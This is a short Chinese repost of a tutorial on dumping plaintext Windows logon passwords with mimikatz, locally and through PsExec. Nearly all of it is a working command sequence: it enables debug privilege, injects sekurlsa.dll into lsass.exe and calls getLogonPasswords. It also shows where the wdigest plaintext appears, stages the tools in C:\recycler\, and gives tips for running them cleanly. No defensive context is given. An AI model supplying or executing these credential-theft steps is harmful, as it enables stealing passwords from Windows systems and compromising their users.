转载自和lcx 核老大的文章,
神器mimikatz 抓windows密码的命令方法
。 本地测试://提升权限privilege::debug//注入dllinject::process lsass.exe sekurlsa.dll//抓取密码@getLogonPasswords
远程抓密码的方法。
首先提取几个文件,只抓取密码的话,只需要这几个文件:
mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll
然后最简单实用的方法,使用 PsExec.exe 启动,
电脑资料
《神器mimikatz 抓windows密码的命令方法》(https://www.unjs.com)。(我的程序保存路径是C:\recycler\)//在本机启动交互式命令提示窗口
C:\recycler\psexec \\127.0.0.1 cmd.exe
//启动一个命令行,然后执行:
mimikatz.exe C:\recycler\mimikatz.exe
//提升权限:
privilege::debug
//注入dll:
inject::process lsass.exe "C:\recycler\sekurlsa.dll" 要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
//抓取密码:
@getLogonPasswords
wdigest后面就是明文密码了
//退出:
exit,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。exit